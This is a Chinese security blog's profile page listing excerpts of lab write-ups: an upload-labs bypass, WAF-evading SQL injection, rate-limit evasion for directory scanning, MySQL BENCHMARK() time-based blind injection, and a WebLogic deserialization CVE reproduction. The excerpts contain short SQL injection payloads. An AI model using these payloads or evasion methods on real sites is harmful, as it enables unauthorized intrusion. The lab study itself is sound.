- 博客(6)
- 收藏
- 关注
RSS订阅原创 upload-labs 21超详细通关笔记+部分代码审计(条件竞争等)
1-1 前端JS校验绕过右键查看源码,发现是在前端进行JS校验,尝试抓包后修改文件类型绕过function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 v
2021-12-02 10:52:44
428
原创 当你第一次发送ping请求包,ARP缓存表为空时会发生什么?(详细解析全过程)
工具:Cisco Packet Tracer本机:PC1 192.168.1.3/24对方:PC2 192.168.1.1/24我们知道,ping命令是属于ICMP协议的,属于OSI七层模型的第三层,当我们在第三层想将ping包封装上IP地址后,需要先发送给第二层封装目的IP对应的MAC地址,但由于我们是第一次ping对方,所以ARP缓存表为空,需要先通过ARP协议来获取对方IP地址对应的MAC地址。开始实验:192.168.1.3/2第一次发送ping的请求包给192.168.1.1/24,可以
2021-09-28 18:35:09
4581
1
原创 绕过安全狗(Apache 4.0.30255)——SQL注入(上)
4.0.30255首先测试是否是注入点这里应该是and被过滤了尝试用大小写与双写都不行,想想也是,安全狗也没那么笨然后尝试用&&代替and于是乎就成功判断出注入点咯,接下来order by判断列数1' order by 3#判断为2列,于是union联合注入查询咯1' union select 1,2#被拦截了奥,现在需要找到是什么函数被拦截了1’ union # 不拦截1’ select 1,2# 不拦截1’ un
2021-09-23 16:39:57
1055
原创 CC攻击——暴力破解/扫描目录绕过WAF(安全狗)
WAF绕过有哪些方法?当我们遇到WAF时时常会感到束手无策,甚至想要放弃渗透(治疗)接下来介绍一下当我们扫描目录/暴力破解时如何绕过WAF(安全狗)我们在扫描目录/暴力破解时约等于CC攻击。绕过WAF识别:CC攻击绕过:CC攻击是属于DDOS攻击的一种,简单来说就是通过匿名HTTP代理进行大量请求导致网页奔溃,我们先来看看WAF(安全狗)是如何防护的:可以看到单IP访问频率超过100次/10秒 就会冻结IP,我们试着模拟攻击一下(其实是扫目录)OK,我们已经被拦截了,但是响应还是200
2021-09-23 00:24:13
2090
原创 MYSQL——时间盲注BENCHMARK()
先上图看效果1' union select 1,BENCHMARK(500000000,(select user from users limit 0,1))#可见benchmark()函数是可以造成延时的。简介:它是MySQL的一个内置函数,用于测试函数或者表达式的执行速度。其运行返回值都是0,仅仅会执行显示时间。用法:benchmark(重复次数, 执行的函数)例如:将select database()执行100000000次,显示耗时0.52secSELECT BENCHMARK(
2021-09-20 19:18:59
3191
原创 WebLogic反序列化漏洞(CVE_2021_2394)
本次利用vulhub靶场的/weblogic/CVE-2020-14882靶机复现攻击机环境与工具:jdk1.8,JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,CVE_2021_2394.jarhttp://dnslog.cn/在dnslog.cn点击get subdomain,得到url urjxbx.dnslog.cn使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jarjava -jar JNDI-Inj
2021-09-12 19:01:00
3260
6
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人